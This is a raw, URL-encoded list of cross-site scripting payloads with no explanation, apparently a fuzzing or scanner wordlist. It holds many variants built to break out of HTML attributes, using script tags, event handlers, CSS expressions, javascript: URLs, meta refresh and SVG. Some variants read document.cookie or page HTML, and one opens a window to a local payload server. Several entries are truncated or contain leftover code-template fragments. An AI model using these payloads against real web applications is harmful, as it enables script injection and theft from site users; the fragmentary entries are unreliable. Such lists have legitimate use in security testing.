%22%3E%3CX%20STYLE=%22X:expression(javascript:alert(1))%22%3E '%3E%3CX%20STYLE=%22X:expression(javascript:alert(1))%22%3E %3CSTYLE%20TYPE=%22text/javascript%22%3Ejavascript:alert(1);%3C/STYLE%3E %22%3E%3CSTYLE%20TYPE=%22text/javascript%22%3Ejavascript:alert(1);%3C/STYLE%3E '%3E%3CSTYLE%20TYPE=%22text/javascript%22%3Ejavascript:alert(1);%3C/STYLE%3E %3CSTYLE%3E.X%7Bbackground-image:url(%22javascript:javascript:alert(1)%22);%7D%3C/STYLE%3E%3CA%20CLASS=X%3E%3C/A%3E %22%3E%3CSTYLE%3E.X%7Bbackground-image:url(%22javascript:javascript:alert(1)%22);%7D%3C/STYLE%3E%3CA%20CLASS=X%3E%3C/A%3E '%3E%3CSTYLE%3E.X%7Bbackground-image:url(%22javascript:javascript:alert(1)%22);%7D%3C/STYLE%3E%3CA%20CLASS=X%3E%3C/A%3E %3CSTYLE%20type=%22text/css%22%3EBODY%7Bbackground:url(%22javascript:javascript:alert(1)%22)%7D%3C/STYLE%3E %22%3E%3CSTYLE%20type=%22text/css%22%3EBODY%7Bbackground:url(%22javascript:javascript:alert(1)%22)%7D%3C/STYLE%3E '%3E%3CSTYLE%20type=%22text/css%22%3EBODY%7Bbackground:url(%22javascript:javascript:alert(1)%22)%7D%3C/STYLE%3E %3C!--[if%20gte%20IE%204]%3E%3CSCRIPT%3Ejavascript:alert(1);%3C/SCRIPT%3E%3C![endif]--%3E %22%3E%3C!--[if%20gte%20IE%204]%3E%3CSCRIPT%3Ejavascript:alert(1);%3C/SCRIPT%3E%3C![endif]--%3E '%3E%3C!--[if%20gte%20IE%204]%3E%3CSCRIPT%3Ejavascript:alert(1);%3C/SCRIPT%3E%3C![endif]--%3E %3CBASE%20HREF=%22javascript:javascript:alert(1);//%22%3E %22%3E%3CBASE%20HREF=%22javascript:javascript:alert(1);//%22%3E '%3E%3CBASE%20HREF=%22javascript:javascript:alert(1);//%22%3E %3COBJECT%20classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389%3E%3Cparam%20name=url%20value=javascript:javascript:alert(1)%3E%3C/OBJECT%3E %22%3E%3COBJECT%20classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389%3E%3Cparam%20name=url%20value=javascript:javascript:alert(1)%3E%3C/OBJECT%3E '%3E%3COBJECT%20classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389%3E%3Cparam%20name=url%20value=javascript:javascript:alert(1)%3E%3C/OBJECT%3E %3CHTML%20xmlns:X%3E%3C?import%20namespace=%22X%22%20implementation=%22%(htc)s%22%3E%3CX:X%3EX%3C/X:X%3E%3C/HTML%3E%22%22%22,%22XML%20namespace.%22),(%22%22%22%3CXML%20ID=%22X%22%3E%3CI%3E%3CB%3E%3C/B%3E%3C/I%3E%3C/XML%3E%3CSPAN%20DATASRC=%22 %22%3E%3CHTML%20xmlns:X%3E%3C?import%20namespace=%22X%22%20implementation=%22%(htc)s%22%3E%3CX:X%3EX%3C/X:X%3E%3C/HTML%3E%22%22%22,%22XML%20namespace.%22),(%22%22%22%3CXML%20ID=%22X%22%3E%3CI%3E%3CB%3E%3C/B%3E%3C/I%3E%3C/XML%3E%3CSPAN%20DATASRC=%22 '%3E%3CHTML%20xmlns:X%3E%3C?import%20namespace=%22X%22%20implementation=%22%(htc)s%22%3E%3CX:X%3EX%3C/X:X%3E%3C/HTML%3E%22%22%22,%22XML%20namespace.%22),(%22%22%22%3CXML%20ID=%22X%22%3E%3CI%3E%3CB%3E%3C/B%3E%3C/I%3E%3C/XML%3E%3CSPAN%20DATASRC=%22 %3CHTML%3E%3CBODY%3E%3C?xml:namespace%20prefix=%22t%22%20ns=%22urn:schemas-microsoft-com:time%22%3E '%3E%3C?xml:namespace%20prefix=%22t%22%20ns=%22urn:schemas-microsoft-com:time%22%3E%3C?import%20namespace=%22t%22%20implementation=%22 %3CHEAD%3E%3CMETA%20HTTP-EQUIV=%22CONTENT-TYPE% %22%3E%3CHEAD%3E%3CMETA%20HTTP-EQUIV=%22CONTENT-TYPE% '%3E%3CHEAD%3E%3CMETA%20HTTP-EQUIV=%22CONTENT-TYPE% %3Cform%20id=%22test%22%20/%3E%3Cbutton%20form=%22test%22%20formaction=%22javascript:javascript:alert(1)%22%3EX %22%3E%3Cform%20id=%22test%22%20/%3E%3Cbutton%20form=%22test%22%20formaction=%22javascript:javascript:alert(1)%22%3EX '%3E%3Cform%20id=%22test%22%20/%3E%3Cbutton%20form=%22test%22%20formaction=%22javascript:javascript:alert(1)%22%3EX %3Cbody%20onscroll=javascript:alert(1)%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cinput%20autofocus%3E %22%3E%3Cbody%20onscroll=javascript:alert(1)%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cinput%20autofocus%3E '%3E%3Cbody%20onscroll=javascript:alert(1)%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cinput%20autofocus%3E %3CP%20STYLE=%22behavior:url(' %22%3E%3CP%20STYLE=%22behavior:url(' '%3E%3CP%20STYLE=%22behavior:url(' %3CSTYLE%3Ea%7Bbackground:url('s1'%20's2)%7D@import%20javascript:javascript:alert(1);');%7D%3C/STYLE%3E %22%3E%3CSTYLE%3Ea%7Bbackground:url('s1'%20's2)%7D@import%20javascript:javascript:alert(1);');%7D%3C/STYLE%3E '%3E%3CSTYLE%3Ea%7Bbackground:url('s1'%20's2)%7D@import%20javascript:javascript:alert(1);');%7D%3C/STYLE%3E %3Cmeta%20charset=%20%22x-imap4-modified-utf7%22&&%3E&&%3Cscript&&%3Ejavascript:alert(1)&&;&&%3C&&/script&&%3E %22%3E%3Cmeta%20charset=%20%22x-imap4-modified-utf7%22&&%3E&&%3Cscript&&%3Ejavascript:alert(1)&&;&&%3C&&/script&&%3E '%3E%3Cmeta%20charset=%20%22x-imap4-modified-utf7%22&&%3E&&%3Cscript&&%3Ejavascript:alert(1)&&;&&%3C&&/script&&%3E '%3E%3C?xml%20version=%221.0%22?%3E%3Chtml:html%20xmlns:html='http://www.w3.org/1999/xhtml'%3E%3Chtml:script%3Ejavascript:alert(1);%3C/html:script%3E%3C/html:html%3E %3Cembed%20code=javascript:javascript:alert(1);%3E%3C/embed%3E %22%3E%3Cembed%20code=javascript:javascript:alert(1);%3E%3C/embed%3E '%3E%3Cembed%20code=javascript:javascript:alert(1);%3E%3C/embed%3E %3Cframeset%20onload=javascript:javascript:alert(1)%3E%3C/frameset%3E %22%3E%3Cframeset%20onload=javascript:javascript:alert(1)%3E%3C/frameset%3E '%3E%3Cframeset%20onload=javascript:javascript:alert(1)%3E%3C/frameset%3E %3Cobject%20onerror=javascript:javascript:alert(1)%3E %22%3E%3Cobject%20onerror=javascript:javascript:alert(1)%3E '%3E%3Cobject%20onerror=javascript:javascript:alert(1)%3E %3CXML%20ID=I%3E%3CX%3E%3CC%3E%3C![CDATA[%3CIMG%20SRC=%22javas]]%3C![CDATA[cript:javascript:alert(1);%22%3E]]%3C/C%3E%3CX%3E%3C/xml%3E %22%3E%3CXML%20ID=I%3E%3CX%3E%3CC%3E%3C![CDATA[%3CIMG%20SRC=%22javas]]%3C![CDATA[cript:javascript:alert(1);%22%3E]]%3C/C%3E%3CX%3E%3C/xml%3E '%3E%3CXML%20ID=I%3E%3CX%3E%3CC%3E%3C![CDATA[%3CIMG%20SRC=%22javas]]%3C![CDATA[cript:javascript:alert(1);%22%3E]]%3C/C%3E%3CX%3E%3C/xml%3E %3CIMG%20SRC=&%7Bjavascript:alert(1);%7D;%3E %22%3E%3CIMG%20SRC=&%7Bjavascript:alert(1);%7D;%3E '%3E%3CIMG%20SRC=&%7Bjavascript:alert(1);%7D;%3E %3Ca%20href=%22jav& %22%3E%3Ca%20href=%22jav& '%3E%3Ca%20href=%22jav& %3Ciframe%20srcdoc=%22& %22%3E%3Cbody/onload=<!-->& '%3E%3Cbody/onload=<!-->& %3Cscript%20allbrowserX%3E/%3Cscript%20*/alert(1)%3C/script %22%3E%3Cscript%20allbrowserX%3E/%3Cscript%20*/alert(1)%3C/script '%3E%3Cscript%20allbrowserX%3E/%3Cscript%20*/alert(1)%3C/script %3Cimg%20src%20?X?\x5C/onerror%20=%20alert(1) %22%3E%3Cimg%20src%20?X?\x5C/onerror%20=%20alert(1) '%3E%3Cimg%20src%20?X?\x5C/onerror%20=%20alert(1) %3Csvg%3E%3Cscript%3E// confirm(1);%3C/script%20%3C/svg%3E %22%3E%3Csvg%3E%3Cscript%3E// confirm(1);%3C/script%20%3C/svg%3E '%3E%3Csvg%3E%3Cscript%3E// confirm(1);%3C/script%20%3C/svg%3E %3Csvg%3E%3Cscript%20onlypossibleinopera:-)%3E%20alert(1) %22%3E%3Csvg%3E%3Cscript%20onlypossibleinopera:-)%3E%20alert(1) '%3E%3Csvg%3E%3Cscript%20onlypossibleinopera:-)%3E%20alert(1) %3Cscript%20x%3E%20alert(1)%20%3C/script%201=2 %22%3E%3Cscript%20x%3E%20alert(1)%20%3C/script%201=2 '%3E%3Cscript%20x%3E%20alert(1)%20%3C/script%201=2 %3Cdiv/onmouseover='alert(1)'%3E%20style=%22x:%22%3E %22%3E%3Cdiv/onmouseover='alert(1)'%3E%20style=%22x:%22%3E '%3E%3Cdiv/onmouseover='alert(1)'%3E%20style=%22x:%22%3E %3C--%60%3Cimg/src=%60%20onerror=alert(1)%3E%20--!%3E %22%3E%3C--%60%3Cimg/src=%60%20onerror=alert(1)%3E%20--!%3E '%3E%3C--%60%3Cimg/src=%60%20onerror=alert(1)%3E%20--!%3E %3Cdiv%20style=%22position:absolute;top %22%3E%3Cdiv%20style=%22position:absolute;top '%3E%3Cdiv%20style=%22position:absolute;top %3Cimg%20src=x%20onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/X.html');%3E %22%3E%3Cimg%20src=x%20onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/X.html');%3E '%3E%3Cimg%20src=x%20onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/X.html');%3E %3Cform%3E%3Cbutton%20formaction=javascript:alert(1)%3EX %22%3E%3Cform%3E%3Cbutton%20formaction=javascript:alert(1)%3EX '%3E%3Cform%3E%3Cbutton%20formaction=javascript:alert(1)%3EX %3Ciframe%20src=%22data:text/html,%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3E%3C/iframe%3E %22%3E%3Ciframe%20src=%22data:text/html,%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3E%3C/iframe%3E '%3E%3Ciframe%20src=%22data:text/html,%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3E%3C/iframe%3E w=window.open('invalidfileinvalidfileinvalidfile','target');setTimeout('alert(w.document.location);w.close();',1); try%7Balert(1)%7Dcatch(e)%7Blocation.reload()%7D %3Cdiv%20id=%22alert('/X/')%22%20style=%22x:expression(eval)(id)%22%3E %22%3E%3Cdiv%20id=%22alert('/X/')%22%20style=%22x:expression(eval)(id)%22%3E '%3E%3Cdiv%20id=%22alert('/X/')%22%20style=%22x:expression(eval)(id)%22%3E 0/%22))%7Dcatch(e)%7Balert(1)%7D// %3Cimg%20language=vbs%20src=%3Cb%20onerror=alert %22%3E%3Cimg%20language=vbs%20src=%3Cb%20onerror=alert '%3E%3Cimg%20language=vbs%20src=%3Cb%20onerror=alert %3Cscript%3Ealert(1)/X/'%3C/script%3E %22%3E%3Cscript%3Ealert(1)/X/'%3C/script%3E '%3E%3Cscript%3Ealert(1)/X/'%3C/script%3E %3Cscript%3Ealert(1)%3C!--%20'%3C/script%3E %22%3E%3Cscript%3Ealert(1)%3C!--%20'%3C/script%3E '%3E%3Cscript%3Ealert(1)%3C!--%20'%3C/script%3E %3Cscript%3E%20var%20a%20=%20%22X%22;%20alert(1);%20%3C/script%3E %22%3E%3Cscript%3E%20var%20a%20=%20%22X%22;%20alert(1);%20%3C/script%3E '%3E%3Cscript%3E%20var%20a%20=%20%22X%22;%20alert(1);%20%3C/script%3E %3Cscript%3E%20var%20a=1';%20alert(1);%20%3C/script%3E %22%3E%3Cscript%3E%20var%20a=1';%20alert(1);%20%3C/script%3E '%3E%3Cscript%3E%20var%20a=1';%20alert(1);%20%3C/script%3E %3Cscript%3E%20var%20x%20=%20%22X/%22;%20alert(1);%20%3C/script%3E %22%3E%3Cscript%3E%20var%20x%20=%20%22X/%22;%20alert(1);%20%3C/script%3E '%3E%3Cscript%3E%20var%20x%20=%20%22X/%22;%20alert(1);%20%3C/script%3E %3Cimg%20src=%221%22%20onerror=%22alert(1)%22%3E %22%3E%3Cimg%20src=%221%22%20onerror=%22alert(1)%22%3E '%3E%3Cimg%20src=%221%22%20onerror=%22alert(1)%22%3E %3Cimg%20src=%22%22%20onload=alert(1)%3E %22%3E%3Cimg%20src=%22%22%20onload=alert(1)%3E '%3E%3Cimg%20src=%22%22%20onload=alert(1)%3E %3Cscript%3E%20function%20a()%20%7B%7D%20%3C/script%3E%20%3Cimg%20src=1%20onerror=%22a();alert(1)%22%3E %22%3E%3Cscript%3E%20function%20a()%20%7B%7D%20%3C/script%3E%20%3Cimg%20src=1%20onerror=%22a();alert(1)%22%3E '%3E%3Cscript%3E%20function%20a()%20%7B%7D%20%3C/script%3E%20%3Cimg%20src=1%20onerror=%22a();alert(1)%22%3E %3Cimg%20src=1%20onerror=%22alert(1)%22%3E %22%3E%3Cimg%20src=1%20onerror=%22alert(1)%22%3E '%3E%3Cimg%20src=1%20onerror=%22alert(1)%22%3E %3Cimg%20src=1%20onerror%22alert(1)%22%3E %22%3E%3Cimg%20src=1%20onerror%22alert(1)%22%3E '%3E%3Cimg%20src=1%20onerror%22alert(1)%22%3E %3Csvg%3E%3Cscript%3Elo%3Csv%3EgChr(1)%3C/script%3E%3C/svg%3E %22%3E%3Csvg%3E%3Cscript%3Elo%3Csv%3EgChr(1)%3C/script%3E%3C/svg%3E '%3E%3Csvg%3E%3Cscript%3Elo%3Csv%3EgChr(1)%3C/script%3E%3C/svg%3E %3Cimg%20src= %3Ca%20href=x%20onerror=alert(1)%3E %22%3E%3Ca%20href=x%20onerror=alert(1)%3E '%3E%3Ca%20href=x%20onerror=alert(1)%3E %3Cscript%3E%20var%20x%20=%20%22asdf/1%20asdf%22;%20alert(1);%20%3C/script%3E %22%3E%3Cscript%3E%20var%20x%20=%20%22asdf/1%20asdf%22;%20alert(1);%20%3C/script%3E '%3E%3Cscript%3E%20var%20x%20=%20%22asdf/1%20asdf%22;%20alert(1);%20%3C/script%3E %3Cimg%20src=xx:xx;onerror=alert(1)%3E %22%3E%3Cimg%20src=xx:xx;onerror=alert(1)%3E '%3E%3Cimg%20src=xx:xx;onerror=alert(1)%3E %3Cimg%20src=x%20%3E%20onerror=%22console.alert(document.getElementsByTagName('html')[0].innerHTML)%22%3E %22%3E%3Cimg%20src=x%20%3E%20onerror=%22console.alert(document.getElementsByTagName('html')[0].innerHTML)%22%3E '%3E%3Cimg%20src=x%20%3E%20onerror=%22console.alert(document.getElementsByTagName('html')[0].innerHTML)%22%3E %3Cscript%3E%20chr=String.fromCharCode(1);%20result='';%20try%7B%20result=encodeURIComponent( %22%3E%3Cscript%3E%20chr=String.fromCharCode(1);%20result='';%20try%7B%20result=encodeURIComponent( '%3E%3Cscript%3E%20chr=String.fromCharCode(1);%20result='';%20try%7B%20result=encodeURIComponent( %3Cscript%3E%20chr=String.fromCharCode(1);%20result='';%20try%7B%20result=encodeURI( %22%3E%3Cscript%3E%20chr=String.fromCharCode(1);%20result='';%20try%7B%20result=encodeURI( '%3E%3Cscript%3E%20chr=String.fromCharCode(1);%20result='';%20try%7B%20result=encodeURI( %3Cimg%20src=x%20%3E%20onerror=alert(1)%3E %22%3E%3Cimg%20src=x%20%3E%20onerror=alert(1)%3E '%3E%3Cimg%20src=x%20%3E%20onerror=alert(1)%3E %3Csvg%3E%3Cscript%3Ealert(1)%3C/script%3E %3Cimg%20src=xx:xx%20onerror=%22& %22%3E%3Cimg%20src=xx:xx%20onerror=%22& '%3E%3Cimg%20src=xx:xx%20onerror=%22& %3Cimg%20src=xx:xx%20onerror=window['alert']%3E %22%3E%3Cimg%20src=xx:xx%20onerror=window['alert']%3E '%3E%3Cimg%20src=xx:xx%20onerror=window['alert']%3E %22'%3E%3Cimg%20src=%22xx:xx%22%20on%20error=%22alert(1);%22%3E %3Cimg%20src=xx:xx%20onerror=alert(1)%3E %22%3E%3Cimg%20src=xx:xx%20onerror=alert(1)%3E '%3E%3Cimg%20src=xx:xx%20onerror=alert(1)%3E %3Cimg%20src=xx:xx%20onerror%20=alert(1);%3E %22%3E%3Cimg%20src=xx:xx%20onerror%20=alert(1);%3E '%3E%3Cimg%20src=xx:xx%20onerror%20=alert(1);%3E %3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220.1;%20URL=javascript:void()//?;URL=javascript:alert(1)//%22%3E %22%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220.1;%20URL=javascript:void()//?;URL=javascript:alert(1)//%22%3E '%3E%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220.1;%20URL=javascript:void()//?;URL=javascript:alert(1)//%22%3E %3Cmeta%20http-equiv=refresh%20content=%22javascript:alert('1')%22%3E %22%3E%3Cmeta%20http-equiv=refresh%20content=%22javascript:alert('1')%22%3E '%3E%3Cmeta%20http-equiv=refresh%20content=%22javascript:alert('1')%22%3E %3Ca%20href=%22javascript:alert(1)%22%3EX%3C/a%3E %22%3E%3Ca%20href=%22javascript:alert(1)%22%3EX%3C/a%3E '%3E%3Ca%20href=%22javascript:alert(1)%22%3EX%3C/a%3E %3Cscript%3E%20document.cookie='X';%20if(document.cookie%20!==%20'X')%20%7B%20alert(1,document.cookie);%20%7D%20%3C/script%3E %22%3E%3Cscript%3E%20document.cookie='X';%20if(document.cookie%20!==%20'X')%20%7B%20alert(1,document.cookie);%20%7D%20%3C/script%3E '%3E%3Cscript%3E%20document.cookie='X';%20if(document.cookie%20!==%20'X')%20%7B%20alert(1,document.cookie);%20%7D%20%3C/script%3E htmlStr%20=%20'%3Ca%20href=%22javascript:alert(1)%22%3EX%3C/a%3E '%3E%3Ca%20href=%22javascript:alert(1)%22%3EX%3C/a%3E';%20document.getElementById('body').innerHTML%20=%20htmlStr;%20try%20%7B%20alert(1);%7Dcatch(e)%7Balert(1);%7D; '%3E%3Ca%20href=%22javascript:alert(1)%22%3EX%3C/a%3E';%20document.getElementById('body').innerHTML%20=%20htmlStr;%20try%20%7B%20if(document.getElementById('body').firstChild.protocol%20===%20'javascript:')%20%7B%20alert(1);%20%7D%20%7Dcatch(e)%7Balert(1);%7D; %3Cimg%20src=x:xx%20onerror=%22try%20%7BexecScript('a=1','vbs');alert(1);%7Dcatch(e)%7Balert(1);%7D%22%3E %22%3E%3Cimg%20src=x:xx%20onerror=%22try%20%7BexecScript('a=1','vbs');alert(1);%7Dcatch(e)%7Balert(1);%7D%22%3E '%3E%3Cimg%20src=x:xx%20onerror=%22try%20%7BexecScript('a=1','vbs');alert(1);%7Dcatch(e)%7Balert(1);%7D%22%3E %3Cdiv%20style=%22color:red'%7B%7D%20x:expression(alert(1))%22%3E.%3C/div%3E %22%3E%3Cdiv%20style=%22color:red'%7B%7D%20x:expression(alert(1))%22%3E.%3C/div%3E '%3E%3Cdiv%20style=%22color:red'%7B%7D%20x:expression(alert(1))%22%3E.%3C/div%3E %3Cimg%20src='xx:x%3E%3Cimg%20src=xx:x%20onerror=alert(1)%3E'%3E %22%3E%3Cimg%20src='xx:x%3E%3Cimg%20src=xx:x%20onerror=alert(1)%3E'%3E '%3E%3Cimg%20src='xx:x%3E%3Cimg%20src=xx:x%20onerror=alert(1)%3E'%3E %3Cimg%20src='xx:x/%20onerror=%22alert(1)%22%3E'%3E %22%3E%3Cimg%20src='xx:x/%20onerror=%22alert(1)%22%3E'%3E '%3E%3Cimg%20src='xx:x/%20onerror=%22alert(1)%22%3E'%3E %3Cimg%20src='xx:x%20onerror=%22alert(1)%22%3E'%3E %22%3E%3Cimg%20src='xx:x%20onerror=%22alert(1)%22%3E'%3E '%3E%3Cimg%20src='xx:x%20onerror=%22alert(1)%22%3E'%3E %60%22'%3E%3Cimg%20src=%22 %3Cimg%20src=xx:xx%20onerror=%22x='/',alert(1)//'%22%3E %22%3E%3Cimg%20src=xx:xx%20onerror=%22x='/',alert(1)//'%22%3E '%3E%3Cimg%20src=xx:xx%20onerror=%22x='/',alert(1)//'%22%3E %3Cscript%3Ealert(alert(1))%3C/script%3E %22%3E%3Cscript%3Ealert(alert(1))%3C/script%3E '%3E%3Cscript%3Ealert(alert(1))%3C/script%3E %3Cscript%3Ex='%3Cscript%3E%3Cimg%20src=xx:xx%20onerror=alert(1)%3E '%3E%3Cimg%20src=xx:xx%20onerror=alert(1)%3E';%3C/script%3E %3Cscript%3Ealert(1)%3Cscript%3E%3C/script%3E %22%3E%3Cscript%3Ealert(1)%3Cscript%3E%3C/script%3E '%3E%3Cscript%3Ealert(1)%3Cscript%3E%3C/script%3E --%3E%3Cimg%20src=xxx:x%20onerror=alert(1)%3E%20--%3E %3Cimg%20src=xx:xx %22%3E%3Cimg%20src=xx:xx '%3E%3Cimg%20src=xx:xx %3Cimg%20src=xx:xx%20alt=%60/onerror=alert(1)//%60%3E %22%3E%3Cimg%20src=xx:xx%20alt=%60/onerror=alert(1)//%60%3E '%3E%3Cimg%20src=xx:xx%20alt=%60/onerror=alert(1)//%60%3E '%3E%3Cimg%20src=xx:xx%20onerror=alert(1)%3E%20%3Ca%20href=javascript:alert(1)%3E1%3C/a%3E %22%3E%3Cimg%20src=xx:xx%20onerror=alert(1)%3E%20%3Ca%20href=javascript:alert(1)%3E1%3C/a%3E %3Cscript%3Ealert(1,1%3C/script//)%3C/script%3E %22%3E%3Cscript%3Ealert(1,1%3C/script//)%3C/script%3E '%3E%3Cscript%3Ealert(1,1%3C/script//)%3C/script%3E %3Cscript%3Ealert(1,1%3C/script/)%3C/script%3E %22%3E%3Cscript%3Ealert(1,1%3C/script/)%3C/script%3E '%3E%3Cscript%3Ealert(1,1%3C/script/)%3C/script%3E %3Cbody%3E%20%C2%A7iframe%20onload=confirm(/X/)>%20%3Cimg%20src=x:x%20onerror=%22innerHTML=previousSibling.nodeValue.replace('%C2%A7','%3C')%22%3E%20%3C/body%3E %22%3E%3Cbody%3E%20%C2%A7iframe%20onload=confirm(/X/)>%20%3Cimg%20src=x:x%20onerror=%22innerHTML=previousSibling.nodeValue.replace('%C2%A7','%3C')%22%3E%20%3C/body%3E '%3E%3Cbody%3E%20%C2%A7iframe%20onload=confirm(/X/)>%20%3Cimg%20src=x:x%20onerror=%22innerHTML=previousSibling.nodeValue.replace('%C2%A7','%3C')%22%3E%20%3C/body%3E %3Cb%20id=%22id1%22%20x=begin0x9fa0end%20%3E%60'%22%3E%3C/b%3E%3Cscript%3Eif%20(!/begin.end/.test(document.getElementById('id1').getAttribute('x')))%20%7B%20alert(1);%7D%3C/script%3E %22%3E%3Cb%20id=%22id1%22%20x=begin0x9fa0end%20%3E%60'%22%3E%3C/b%3E%3Cscript%3Eif%20(!/begin.end/.test(document.getElementById('id1').getAttribute('x')))%20%7B%20alert(1);%7D%3C/script%3E '%3E%3Cb%20id=%22id1%22%20x=begin0x9fa0end%20%3E%60'%22%3E%3C/b%3E%3Cscript%3Eif%20(!/begin.end/.test(document.getElementById('id1').getAttribute('x')))%20%7B%20alert(1);%7D%3C/script%3E %3Cb%20id=%22id1%22%20x=begin0x2924end%20%3E%60'%22%3E%3C/b%3E%3Cscript%3Eif%20(!/begin.end/.test(document.getElementById('id1').getAttribute('x')))%20%7B%20alert(1);%7D%3C/script%3E %22%3E%3Cb%20id=%22id1%22%20x=begin0x2924end%20%3E%60'%22%3E%3C/b%3E%3Cscript%3Eif%20(!/begin.end/.test(document.getElementById('id1').getAttribute('x')))%20%7B%20alert(1);%7D%3C/script%3E '%3E%3Cb%20id=%22id1%22%20x=begin0x2924end%20%3E%60'%22%3E%3C/b%3E%3Cscript%3Eif%20(!/begin.end/.test(document.getElementById('id1').getAttribute('x')))%20%7B%20alert(1);%7D%3C/script%3E %3Ctitle%3EX%3Cscript%3Ealert(1)%3C/script%3E '%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/title%3E %3Cdiv%20style=%22X:expression(alert(1))/%22%3E%3C/div%3E %22%3E%3Cdiv%20style=%22X:expression(alert(1))/%22%3E%3C/div%3E '%3E%3Cdiv%20style=%22X:expression(alert(1))/%22%3E%3C/div%3E %3Cdiv%20style=%22X:expression(alert(1))'%22%3E%3C/div%3E %22%3E%3Cdiv%20style=%22X:expression(alert(1))'%22%3E%3C/div%3E '%3E%3Cdiv%20style=%22X:expression(alert(1))'%22%3E%3C/div%3E %3Cdiv%20style=%22X:expression(alert(1))%22%3E%3C/div%3E %22%3E%3Cdiv%20style=%22X:expression(alert(1))%22%3E%3C/div%3E '%3E%3Cdiv%20style=%22X:expression(alert(1))%22%3E%3C/div%3E %3Cdiv%20style=%22X:expression(alert(1))%22%3EX/div%3E %22%3E%3Cdiv%20style=%22X:expression(alert(1))%22%3EX/div%3E '%3E%3Cdiv%20style=%22X:expression(alert(1))%22%3EX/div%3E %3Cimg%20src=1%20title=%20x:xx/onerror=alert(1)%3E %22%3E%3Cimg%20src=1%20title=%20x:xx/onerror=alert(1)%3E '%3E%3Cimg%20src=1%20title=%20x:xx/onerror=alert(1)%3E %3Cscript%3Eif(%22x/%22.length==2)%20%7B%20alert(1);%7D%3C/script%3E %22%3E%3Cscript%3Eif(%22x/%22.length==2)%20%7B%20alert(1);%7D%3C/script%3E '%3E%3Cscript%3Eif(%22x/%22.length==2)%20%7B%20alert(1);%7D%3C/script%3E %3Cscript%3Eif(%22x/%22.length==1)%20%7B%20alert(1);%7D%3C/script%3E %22%3E%3Cscript%3Eif(%22x/%22.length==1)%20%7B%20alert(1);%7D%3C/script%3E '%3E%3Cscript%3Eif(%22x/%22.length==1)%20%7B%20alert(1);%7D%3C/script%3E %3Cimg%20src=xxx:xxx%20title=1/onerror=alert(1)%3E %22%3E%3Cimg%20src=xxx:xxx%20title=1/onerror=alert(1)%3E '%3E%3Cimg%20src=xxx:xxx%20title=1/onerror=alert(1)%3E %3Cscript%3Eif(%22xx%22%20==%20%22xx%22)%20%7B%20alert(1);%7D%3C/script%3E %22%3E%3Cscript%3Eif(%22xx%22%20==%20%22xx%22)%20%7B%20alert(1);%7D%3C/script%3E '%3E%3Cscript%3Eif(%22xx%22%20==%20%22xx%22)%20%7B%20alert(1);%7D%3C/script%3E %3Cimg%20src=x%20onError=%22javascript:alert(1)%22/%3E '%3E%3Cscript%20type=%22text/javascript%22%3Ealert(1);%3C/script%3E %3Cscript%20charset='utf-8'%3Ealert(1)%3C/script%3E %22%3E%3Cscript%20charset='utf-8'%3Ealert(1)%3C/script%3E '%3E%3Cscript%20charset='utf-8'%3Ealert(1)%3C/script%3E %3Cstyle%3E%3C/style%3E%3Cimg%20src=%22about:blank%22%20onerror=alert(1)//%3E%3C/style%3E %22%3E%3Cstyle%3E%3C/style%3E%3Cimg%20src=%22about:blank%22%20onerror=alert(1)//%3E%3C/style%3E '%3E%3Cstyle%3E%3C/style%3E%3Cimg%20src=%22about:blank%22%20onerror=alert(1)//%3E%3C/style%3E %3Cscript%3Ea='X//';alert(1)//X';%3C/script%3E %22%3E%3Cscript%3Ea='X//';alert(1)//X';%3C/script%3E '%3E%3Cscript%3Ea='X//';alert(1)//X';%3C/script%3E %3Cscript%3Etry%7Beval(%22%3C%3E%3C/%3E%22);alert(1)%7Dcatch(e)%7Balert(1)%7D;%3C/script%3E 